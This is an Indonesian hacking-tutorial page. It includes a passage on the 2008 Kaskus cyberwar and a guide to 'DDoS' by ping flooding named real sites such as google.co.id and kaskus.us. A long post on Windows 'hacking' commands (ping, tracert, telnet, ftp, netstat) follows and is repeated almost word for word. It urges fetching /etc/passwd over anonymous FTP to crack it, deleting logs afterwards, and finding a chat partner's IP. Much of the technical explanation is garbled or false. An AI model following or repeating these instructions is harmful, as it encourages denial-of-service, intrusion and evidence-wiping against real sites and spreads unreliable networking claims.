Perang cyber antara kedua komunitas ini akhirnya selesai ketika kedua pengelola situs menandatangani memorandum online untuk menyudahkan pertikaian di antara keduanya. Pesan tersebut dipampang selama beberapa minggu di halaman situs masing-masing.
Meskipun kerusakan yang ditimbulkan oleh serangan ini cukup berat, administrator Kaskus menjanjikan bahwa Kaskus akan kembali normal pada bulan Juli 2008, seiring dengan diluncurkannya server baru Kaskus di gedung Cyber, Jakarta. Namun, ia juga mengatakan bahwa data-data yang akan dimunculkan kembali adalah data yang dimuat sebelum tahun 2008, sementara data yang dibuat selama tahun 2008 tidak dapat dimunculkan kembali.
Ditulis oleh template (Co-Admin KasKus dengan User ID 5)
nah, percaya atau nggak, hal ini bisa kita jalankan ( DDoS ) atau lakukan hanya dengan bermodalkan DOS ( sekarang disebut Comand Prompt atau CMD ) dan tanpa software-software yang harganya muaaahaaaaaal banget.
berikut ini Dino berikan cara-caranya ( Singkat mode : On )
Penjelasan da DDoS
Aksi Denial of Service adalah salah satu cara menghentikan atau mematikan sebuah service pada komputer atau server. Sebenarnya, teknik ini adalah teknik yang suaaaangat kuno sekali yang banyak dilakukan pada zaman purbakala. Namun, pada zaman sekarang, banyak sistem yang telah di Upgrade, maka, cara ini akan sangat susah sekali untuk dijalankan. saran saya, sebaliknya anda mencoba pada komputer atau website dalam sebuah jaringan dan diketahui spesifikasinya RENDAH (-an).
penambahan opsi l merupakan salah satu senjata Hacking yang digunakan dalam aktivitas hacking. Dengan huruf l (-l (el) ), maka, ukuran default buffer yang anda kirimkan adalah sebesar 32 bytes bisa diubah. dalam aksi hacking, apabila seseorang menggunakan nilai buffer yang sangat bueeesar sekali ( Seperti User YogyaFree ) tentu hal ini akan sangan berbahaya sekali, tentu hal ini akan sangat berbahaya pada komputer yang spesifikasinya rendah ( Seperti komputer pentium 2 ) terutama dalam sebuah jaringan. Efeknya akan langsung terlihat dan bekerja, yang berupa komputer atau website target bisa menjadi Hang.
Penulisannya adalah dengan mengetikan data ini didalam CMD atau DOS :
Ping -l ip-address/domain-target
sebagai contoh untuk domain target :
Ping -l www.google.co.id 100000
Contoh untuk domain IP address target :
Ping -l 216.239.61.104 100000
Proses ini akan mengirimkan data sebesar 100000 paket data ke target. Dimana hal ini lebih tinggi dibandingkan kapasitas TCP/IP Google yang hanya sebesar 90000 ( Contoh aja Gan ).
Perintah kedua yang digunakan dalam aksi DDoS ini adalah opsi -t. Penulisannya adalah : Ping -t ip-address/domain-target. ( Cara penggunaannya sama seperti -l )
Hal ini akan mengirimkan 32 bytes data ke target secara bertubi-tubi. Hal inilah yang menyebabkan komputer dengan spesifikasi Rendah akan menjadi hang atau Down. Pemberhentian ini hanya bisa dilakukan dengan menekan tombol Ctrl+C pada keyBoard anda.
Coba anda perhatikan gambar, perintah ping dilakukan secara terus menerus oleh Dino pada www.kaskus.us
Akan lebih parah lagi jika kedua opsi tersebut digabungkan menjadi satu :
Ping -t -l ip-address/domain-target
Sunday, 14 February 2010
Hacking Menggunakan DOS
Microsoft DOS datang dengan beberapa hacking tool tersembunyi yang akan saya diskusikan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalam manual ini saya akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP
Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.
1. ping
2. tracert
3. telnet
4. ftp
5. netstat
OK, inilah keterangannya.
1. ping
Utiliy ini digunakan untuk mencari keberadaan remote host. Yan gmengirmkan sebuah signal SYN ke remote host dan jika remote host membalas maka berarti memang ada suatu remote machine.
Cobalah anda ketik perintah ini:
C:\windows>ping/?
*************
Newbie tip: mengetik '/?' setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah ‘help’ untuk menampilkan seluruh perintah dos.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.
Jadi saya dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh saya mengetik “ping localhost” maka saya mendapatkan.
Pinging chintan [127.0.0.1] with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
************
Newbie tip: 'localhost' adalah ip 127.0.0.1 dan merupakan ip address kita sendiri. Juga dikenal sebagai loopback ip. Tapi saat anda terhubung ke internet anda akan diberi ip baru oleh isp anda sebagai identifikasi diri anda. Anda dapat mencari tahu ip anda dengan mengetik”winipcfg” pada menu Start-Run bagi pengguna Win98, sedangkan yang lainnya hanya mengetikkan “ipconfig” pada command prompt.
***********
Hal ini menunjukkan kepada saya bahwa 32 byte data dikirim ke 127.0.0.1 dan dibalas kembali kurang dari 10ms. TTL adalah Time To Live dan nilai range dari 0 hingga 255 (default 128). Sekarang biar kita lihat apa yang terjadi jika saya mengetik “ping http://www.yahoo.com”
Pinging http://www.yahoo.akadns.net [66.218.71.87] with 32 bytes of data:
Reply from 66.218.71.87: bytes=32 time=3448ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2276ms TTL=54
Reply from 66.218.71.87: bytes=32 time=1799ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2850ms TTL=54
Ping statistics for 66.218.71.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1799ms, Maximum = 3448ms, Average = 2593ms
Tapi bagaimana ping tersebut digunakan oleh para hacker? Baiklah, ada dua opsi ‘|’ dan ‘-t’ yang mematikan. -| digunakan untuk spesifikasi ukuran buffer yang dikirimkan (defaultnya 32 byte) bagaimana jika saya mengetik “ping -| 65600 target.com” maka hal ini akan membawa maut 65600 paket data ke target.com yang lebih tinggi dari kapasitas TCP/IP 65535. Tindakan ini menyebabkan target.com menjadi hang dan harus di restart.
Dan jika saya mengetik “ping –t target.com” hal ini akan meneruskan pengiriman 32 byte data ke target.com hingga menghabiskan resource dan menyebabkan hang. Dua jenis serangan diatas dikenal sebagai ping attack bagi penyerang Dos.
***********
Newbie tip: 'Dos' yang terakhir disebutkan adalah Denial of service yang dilancarkan oleh hacker untuk menghentikan service pada remote machine.
***********
Catatan: Jenis serangan ini dimasa lalu sering digunakan, namun saat ini pada sistem yang telah diperbarui hal tersebut tidak akan bekerja lagi.
2. Tracert
Perintah Tracert melakukan penjejakan ke remote machine. Sebelum request kita menjangkau remote machine melalui router yang berbeda diantaranya. Tool tracert (dikenal sebagai ‘traceroute’ pada unix) pada awalnya dirancang untuk mencari router mana yang mengalami masalah. Perintah tersebut menunjukkan ip address router yang dilalui request kita sebelum menjangkau remote maching. Sebagai contoh, jika saya mengetik “tracert http://www.yahoo.com/” pada dos prompt maka akan terdapat:
Tracing route to http://www.yahoo.akadns.net [66.218.71.87]
over a maximum of 30 hops:
1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11]
2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2]
3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177]
4 * 2885 ms 2749 ms lan-202-144-83-4.maa.sify.net [202.144.83.4]
5 * * * Request timed out.
6 * * * Request timed out.
7 * * * Request timed out.
8 * * * Request timed out.
9 * * * Request timed out.
10 * 3408 ms * http://www.yahoo.akadns.net [66.218.71.87]
11 * * * Request timed out.
12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
16 * * * Request timed out.
17 482 ms 698 ms 624 ms w8.scd.yahoo.com [66.218.71.87]
Trace complete.
Baris pertama memberitahukan kita ip mana yang menjejaki dan kemudian jumlah hop. Jumlah hop tergantung pada jumlah server yang ada diantaranya. Setelah memulai tracing. Request pertama saya melalui sify.net (nama ISP server saya) kemudian melalui server yang berbeda dan terakhir menjangkau w8.scd.yahoo.com. Jadi kita dapat melihat berapa lama prosedurnya. Kapanpun anda membuka http://www.yahoo.com/ dalam web browser, request anda selalu melalui isp dulu (untuk mendapatkan ip dari http://www.yahoo.com/ dari daftar nama domainnya) kemudian server lain dalam jalur tersebut dan terakhir pada yahoo.
Jadi bagaimana tracert digunakan oleh para hacker. Perintah ini digunakan untuk mencari firewall dan melumpuhkannya. Tracer digunakan bersamaan dengan nmap dapat mengetahui ip sebenarnya dimana firewall terpasang, kemudian hacker tersebut akan melumpuhkannya. Untuk contoh diatas kita melihat bahwa proses tracing terhenti pada w8.scd.yahoo.com. Namun hal ini bukanlah tujuan sebenarnya. Hal itu dikarenakan dihentikan oleh firewall. Mengenai masalah firewall akan kita bahas dalam artikel tersendiri.
3. Telnet
Jika anda menggunakan windows maka ‘telnet’ merupakan hacking tool terhebat bagi anda. Sebenarnya merupakan sebuah terminal yang dapat mengakses remote machine dan menggunakan service-nya. Melalui telnet anda dapat menentukan suatu koneksi antara mesin anda dan remote machine melalui port tertentu.
***********
Newbie tip: Disini saya membicarakan tentang virtual port. Tidak secara fisik yang anda lihat dibalik CPU anda. Hanya sebagai physical port yang digunakan untuk koneksi ke hardware dan dengan cara yang sama virtual port digunakan untuk koneksi pada software. TCP/IP memiliki 65,535 virtual port.
***********
Jika anda mengentik “telnet target.com” maka anda terhubung ke target.com pada prot no. 23 (port yang menjalankan telnet service). Anda juga bisa terhubung ke suatu port lainnya dengan mengetik nomor port setelah target.com. sebagai contoh jika saya ingin terhubung ke port no. 25 (SMTP service) maka salya akan mengetik “telnet target.com 25”.
***********
Newbie tip: Setiap port menjalankan service tertentu. Untuk mendaptkan daftar service yang dijalankan pada port tertentu yang bukalah “C:\windows\services" pada notepad.
***********
Sesaat anda terhubung ke sebuah remote machine pada port tertentu, sebuah window popup telnet dengan daemon yang menjalankan port tersebut menunggu anda mengetikkan perintah. Sebagai contoh “telnet http://www.cyberspace.org/” maka seperti gambar dibawah inilah yang saya dapatkan.
Saya harus login disana dan mengetik suatu password dan saya mendapatkan linux shell prompt. Baiklah jika anda mengetikan newuser disana untuk mendapatkan sebuah LoginID dan Password. Dan stelah itu saya menyiapkan perintah untuk mengeksekusi secara remote.
Well, http://www.cyberspace.org/ memiliki server Linux. Jadi jika anda tidak familiar dengan Linux anda tidak akan mampu menggunakan service-nya.
4. FTP
FTP adalah File Transfer Protocol. Melalui ini anda dapat mendownload atau mengupload file. Dan apa yang hacker inginkan dari ini? Benar!! Tinggal mengeti “ftp target.com” dan daemon banner akan ditampilkan. Tapi disini, dengan tujuan menampilkan file transfer pertama kali anda harus login. Beberapa website mengijinkan adanya naonymous login. Contohnya mengetikkan login “anonymous” dan email-address anda sebagai password. Tentunya anda harus mengetikkan email palsu. Sekarang anda boleh mulai mendownload dan mengupload file. Namun untuk itu anda adanya suatu perintah. Pada FTP prompt anda dapat mengetikkan “?”. Maka akan ditampilkan sbb:
! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary globe mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir
Untuk mendaptkan bantuan pada berbagai perintah contohnya perintah delete, mengetikan “? Delete”. Beberapa perintah penting lainnya adalah:
1. 'pwd' to know the present directory at remote machine.
contohnya. ftp>pwd
/etc/home
2. 'lcd' to change the local directory.
contohnya. ftp>lcd C:\windows
local directory now C:\windows
3. 'cd' to change the remote directory.
contohnya. ftp>cd /etc
remote directory now /etc
4. 'mput' to send multiple files to remote machine.
contohnya. ftp>mput *.*
sends all files from C:\windows to /etc
5. 'mget' to get multiple files from remote machine.
contohnya. ftp>mget *.*
gets all files from /etc to C:\windows
6. 'open' to establish a connection with remote host.
contohnya. ftp>open http://www.target.com
7. 'bye' closes the connection and quits from ftp
Untuk perintah lainnya dari ftp silakan lihat help mereka.
Sekarang pada yang port FTP (prot 21) adalah membuka http://www.nosecurity.com/. Seorang hacker akan terhubung ke situs tersebut menggunakan “ftp http://www.nosecurity.com/” pada dos prompt. Kemudian dia akan mencoba login secara anonymous. Dengan anggapan bahwa http://www.nosecurity.com/ menggunakan linux server, maka hacker tersebut akan mengtikkan perintah “get /etc/apsswd” untuk mendaptkan file password dan mengcracknya. Jika anda adalah seorang hacker, maka jangan lupa untuk menghapus log tersebut.
5. netstat
Anda dapat menentukan suatu koneksi dengan remote machine pada port tertentu, hanya saat port tersebut dibuka pada remote machine. Sebagai contoh, jika anda ingin menentukan sebuah koneksi dengan http://www.target.com/ pada port 23 (telnet) maka port tersebut seharusnya terbuka pada http://www.target.com/. Dan seluruh aktifitas hacking umumnya menggunakan port yang terbuka. Mengetikkan “netstat /?” pada dos prompt memberikan:
Displays protocol statistics and current TCP/IP network connections.
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.
Opsi akan menjelaskan fungsinya masing-masing. Dan yang terpenting adalah opsi –a dan –n. Opsi –a menampilkan seluruh port yang terbuka pada mesin tersebut. Dan jika saya menggunakan opsi –n maka akan menunjukkan ip address sebagai ganti dari domain. Saya mendapatkan hal berikut ini jika saya mengetik “netstat –a” pada command prompt.
Active Connections
Proto Local Address Foreign Address State
TCP chintan:1027 0.0.0.0:0 LISTENING
TCP chintan:80 0.0.0.0:0 LISTENING
TCP chintan:135 0.0.0.0:0 LISTENING
TCP chintan:6435 0.0.0.0:0 LISTENING
TCP chintan:1025 0.0.0.0:0 LISTENING
TCP chintan:1026 0.0.0.0:0 LISTENING
TCP chintan:1028 0.0.0.0:0 LISTENING
TCP chintan:1309 0.0.0.0:0 LISTENING
TCP chintan:1310 0.0.0.0:0 LISTENING
TCP chintan:1285 rumcajs.box.sk:80 ESTABLISHED
TCP chintan:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
TCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
TCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
TCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED
”Proto” menyatakan nama protocol tersebut, “localaddress” memberikan ipaddress kita dan port yang terbuka. “Foreign Address” menyatkaan ipaddress dengan namor port yang terhubung ke kita. “State” menyatakan pernyataan saat ini jika suatu koneksi “established” atau listening atau hanya “waiting”.
Sebagai contoh jika saya membuka http://www.yahoo.com/ maka saat saya menjalankan “netstat –a” saya akan mendapatkan masukan seperti ini:
"TCP 203.43.50.81:2034 http://www.yahoo.com:80 ESTABLISHED"
Komputer saya dengan ip 203.43.50.81 melalui port 2034 terhubung dengan yahoo pada port 80
*************
Newbie tip: Dengna cara ini anda bisa mendapatkan ip seseorang yang chatting dengan ada. Pertama kali jalankan “netstat –an” dan lihat dibawah foreign ip address. Sekarang mulailah private chating dengan orang lain. Juga jalankan “netstat –an” dan anda akan mendapatkan satu lagin foreign ip pada akhirnya. Inilah ip orang tersebut.
*************
Microsoft DOS datang dengan beberapa hacking tool tersembunyi yang akan saya diskusikan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalam manual ini saya akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP
Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.
1. ping
2. tracert
3. telnet
4. ftp
5. netstat
OK, inilah keterangannya.
1. ping
Utiliy ini digunakan untuk mencari keberadaan remote host. Yan gmengirmkan sebuah signal SYN ke remote host dan jika remote host membalas maka berarti memang ada suatu remote machine.
Cobalah anda ketik perintah ini:
C:\windows>ping/?
*************
Newbie tip: mengetik '/?' setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah ‘help’ untuk menampilkan seluruh perintah dos.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.
Jadi saya dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh saya mengetik “ping localhost” maka saya mendapatkan.
Pinging chintan [127.0.0.1] with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
************
Newbie tip: 'localhost' adalah ip 127.0.0.1 dan merupakan ip address kita sendiri. Juga dikenal sebagai loopback ip. Tapi saat anda terhubung ke internet anda akan diberi ip baru oleh isp anda sebagai identifikasi diri anda. Anda dapat mencari tahu ip anda dengan mengetik”winipcfg” pada menu Start-Run bagi pengguna Win98, sedangkan yang lainnya hanya mengetikkan “ipconfig” pada command prompt.
***********
Hal ini menunjukkan kepada saya bahwa 32 byte data dikirim ke 127.0.0.1 dan dibalas kembali kurang dari 10ms. TTL adalah Time To Live dan nilai range dari 0 hingga 255 (default 128). Sekarang biar kita lihat apa yang terjadi jika saya mengetik “ping http://www.yahoo.com”
Pinging http://www.yahoo.akadns.net [66.218.71.87] with 32 bytes of data:
Reply from 66.218.71.87: bytes=32 time=3448ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2276ms TTL=54
Reply from 66.218.71.87: bytes=32 time=1799ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2850ms TTL=54
Ping statistics for 66.218.71.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1799ms, Maximum = 3448ms, Average = 2593ms
Tapi bagaimana ping tersebut digunakan oleh para hacker? Baiklah, ada dua opsi ‘|’ dan ‘-t’ yang mematikan. -| digunakan untuk spesifikasi ukuran buffer yang dikirimkan (defaultnya 32 byte) bagaimana jika saya mengetik “ping -| 65600 target.com” maka hal ini akan membawa maut 65600 paket data ke target.com yang lebih tinggi dari kapasitas TCP/IP 65535. Tindakan ini menyebabkan target.com menjadi hang dan harus di restart.
Dan jika saya mengetik “ping –t target.com” hal ini akan meneruskan pengiriman 32 byte data ke target.com hingga menghabiskan resource dan menyebabkan hang. Dua jenis serangan diatas dikenal sebagai ping attack bagi penyerang Dos.
***********
Newbie tip: 'Dos' yang terakhir disebutkan adalah Denial of service yang dilancarkan oleh hacker untuk menghentikan service pada remote machine.
***********
Catatan: Jenis serangan ini dimasa lalu sering digunakan, namun saat ini pada sistem yang telah diperbarui hal tersebut tidak akan bekerja lagi.
2. Tracert
Perintah Tracert melakukan penjejakan ke remote machine. Sebelum request kita menjangkau remote machine melalui router yang berbeda diantaranya. Tool tracert (dikenal sebagai ‘traceroute’ pada unix) pada awalnya dirancang untuk mencari router mana yang mengalami masalah. Perintah tersebut menunjukkan ip address router yang dilalui request kita sebelum menjangkau remote maching. Sebagai contoh, jika saya mengetik “tracert http://www.yahoo.com/” pada dos prompt maka akan terdapat:
Tracing route to http://www.yahoo.akadns.net [66.218.71.87]
over a maximum of 30 hops:
1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11]
2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2]
3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177]
4 * 2885 ms 2749 ms lan-202-144-83-4.maa.sify.net [202.144.83.4]
5 * * * Request timed out.
6 * * * Request timed out.
7 * * * Request timed out.
8 * * * Request timed out.
9 * * * Request timed out.
10 * 3408 ms * http://www.yahoo.akadns.net [66.218.71.87]
11 * * * Request timed out.
12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
16 * * * Request timed out.
17 482 ms 698 ms 624 ms w8.scd.yahoo.com [66.218.71.87]
Trace complete.
Baris pertama memberitahukan kita ip mana yang menjejaki dan kemudian jumlah hop. Jumlah hop tergantung pada jumlah server yang ada diantaranya. Setelah memulai tracing. Request pertama saya melalui sify.net (nama ISP server saya) kemudian melalui server yang berbeda dan terakhir menjangkau w8.scd.yahoo.com. Jadi kita dapat melihat berapa lama prosedurnya. Kapanpun anda membuka http://www.yahoo.com/ dalam web browser, request anda selalu melalui isp dulu (untuk mendapatkan ip dari http://www.yahoo.com/ dari daftar nama domainnya) kemudian server lain dalam jalur tersebut dan terakhir pada yahoo.
Jadi bagaimana tracert digunakan oleh para hacker. Perintah ini digunakan untuk mencari firewall dan melumpuhkannya. Tracer digunakan bersamaan dengan nmap dapat mengetahui ip sebenarnya dimana firewall terpasang, kemudian hacker tersebut akan melumpuhkannya. Untuk contoh diatas kita melihat bahwa proses tracing terhenti pada w8.scd.yahoo.com. Namun hal ini bukanlah tujuan sebenarnya. Hal itu dikarenakan dihentikan oleh firewall. Mengenai masalah firewall akan kita bahas dalam artikel tersendiri.
3. Telnet
Jika anda menggunakan windows maka ‘telnet’ merupakan hacking tool terhebat bagi anda. Sebenarnya merupakan sebuah terminal yang dapat mengakses remote machine dan menggunakan service-nya. Melalui telnet anda dapat menentukan suatu koneksi antara mesin anda dan remote machine melalui port tertentu.
***********
Newbie tip: Disini saya membicarakan tentang virtual port. Tidak secara fisik yang anda lihat dibalik CPU anda. Hanya sebagai physical port yang digunakan untuk koneksi ke hardware dan dengan cara yang sama virtual port digunakan untuk koneksi pada software. TCP/IP memiliki 65,535 virtual port.
***********
Jika anda mengentik “telnet target.com” maka anda terhubung ke target.com pada prot no. 23 (port yang menjalankan telnet service). Anda juga bisa terhubung ke suatu port lainnya dengan mengetik nomor port setelah target.com. sebagai contoh jika saya ingin terhubung ke port no. 25 (SMTP service) maka salya akan mengetik “telnet target.com 25”.
***********
Newbie tip: Setiap port menjalankan service tertentu. Untuk mendaptkan daftar service yang dijalankan pada port tertentu yang bukalah “C:\windows\services" pada notepad.
***********
Sesaat anda terhubung ke sebuah remote machine pada port tertentu, sebuah window popup telnet dengan daemon yang menjalankan port tersebut menunggu anda mengetikkan perintah. Sebagai contoh “telnet http://www.cyberspace.org/” maka seperti gambar dibawah inilah yang saya dapatkan.
Saya harus login disana dan mengetik suatu password dan saya mendapatkan linux shell prompt. Baiklah jika anda mengetikan newuser disana untuk mendapatkan sebuah LoginID dan Password. Dan stelah itu saya menyiapkan perintah untuk mengeksekusi secara remote.
Well, http://www.cyberspace.org/ memiliki server Linux. Jadi jika anda tidak familiar dengan Linux anda tidak akan mampu menggunakan service-nya.
4. FTP
FTP adalah File Transfer Protocol. Melalui ini anda dapat mendownload atau mengupload file. Dan apa yang hacker inginkan dari ini? Benar!! Tinggal mengeti “ftp target.com” dan daemon banner akan ditampilkan. Tapi disini, dengan tujuan menampilkan file transfer pertama kali anda harus login. Beberapa website mengijinkan adanya naonymous login. Contohnya mengetikkan login “anonymous” dan email-address anda sebagai password. Tentunya anda harus mengetikkan email palsu. Sekarang anda boleh mulai mendownload dan mengupload file. Namun untuk itu anda adanya suatu perintah. Pada FTP prompt anda dapat mengetikkan “?”. Maka akan ditampilkan sbb:
! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary globe mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir
Untuk mendaptkan bantuan pada berbagai perintah contohnya perintah delete, mengetikan “? Delete”. Beberapa perintah penting lainnya adalah:
1. 'pwd' to know the present directory at remote machine.
contohnya. ftp>pwd
/etc/home
2. 'lcd' to change the local directory.
contohnya. ftp>lcd C:\windows
local directory now C:\windows
3. 'cd' to change the remote directory.
contohnya. ftp>cd /etc
remote directory now /etc
4. 'mput' to send multiple files to remote machine.
contohnya. ftp>mput *.*
sends all files from C:\windows to /etc
5. 'mget' to get multiple files from remote machine.
contohnya. ftp>mget *.*
gets all files from /etc to C:\windows
6. 'open' to establish a connection with remote host.
contohnya. ftp>open http://www.target.com
7. 'bye' closes the connection and quits from ftp
Untuk perintah lainnya dari ftp silakan lihat help mereka.
Sekarang pada yang port FTP (prot 21) adalah membuka http://www.nosecurity.com/. Seorang hacker akan terhubung ke situs tersebut menggunakan “ftp http://www.nosecurity.com/” pada dos prompt. Kemudian dia akan mencoba login secara anonymous. Dengan anggapan bahwa http://www.nosecurity.com/ menggunakan linux server, maka hacker tersebut akan mengtikkan perintah “get /etc/apsswd” untuk mendaptkan file password dan mengcracknya. Jika anda adalah seorang hacker, maka jangan lupa untuk menghapus log tersebut.
5. netstat
Anda dapat menentukan suatu koneksi dengan remote machine pada port tertentu, hanya saat port tersebut dibuka pada remote machine. Sebagai contoh, jika anda ingin menentukan sebuah koneksi dengan http://www.target.com/ pada port 23 (telnet) maka port tersebut seharusnya terbuka pada http://www.target.com/. Dan seluruh aktifitas hacking umumnya menggunakan port yang terbuka. Mengetikkan “netstat /?” pada dos prompt memberikan:
Displays protocol statistics and current TCP/IP network connections.
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.
Opsi akan menjelaskan fungsinya masing-masing. Dan yang terpenting adalah opsi –a dan –n. Opsi –a menampilkan seluruh port yang terbuka pada mesin tersebut. Dan jika saya menggunakan opsi –n maka akan menunjukkan ip address sebagai ganti dari domain. Saya mendapatkan hal berikut ini jika saya mengetik “netstat –a” pada command prompt.
Active Connections
Proto Local Address Foreign Address State
TCP chintan:1027 0.0.0.0:0 LISTENING
TCP chintan:80 0.0.0.0:0 LISTENING
TCP chintan:135 0.0.0.0:0 LISTENING
TCP chintan:6435 0.0.0.0:0 LISTENING
TCP chintan:1025 0.0.0.0:0 LISTENING
TCP chintan:1026 0.0.0.0:0 LISTENING
TCP chintan:1028 0.0.0.0:0 LISTENING
TCP chintan:1309 0.0.0.0:0 LISTENING
TCP chintan:1310 0.0.0.0:0 LISTENING
TCP chintan:1285 rumcajs.box.sk:80 ESTABLISHED
TCP chintan:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
TCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
TCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
TCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED
”Proto” menyatakan nama protocol tersebut, “localaddress” memberikan ipaddress kita dan port yang terbuka. “Foreign Address” menyatkaan ipaddress dengan namor port yang terhubung ke kita. “State” menyatakan pernyataan saat ini jika suatu koneksi “established” atau listening atau hanya “waiting”.
Sebagai contoh jika saya membuka http://www.yahoo.com/ maka saat saya menjalankan “netstat –a” saya akan mendapatkan masukan seperti ini:
"TCP 203.43.50.81:2034 http://www.yahoo.com:80 ESTABLISHED"
Komputer saya dengan ip 203.43.50.81 melalui port 2034 terhubung dengan yahoo pada port 80
*************
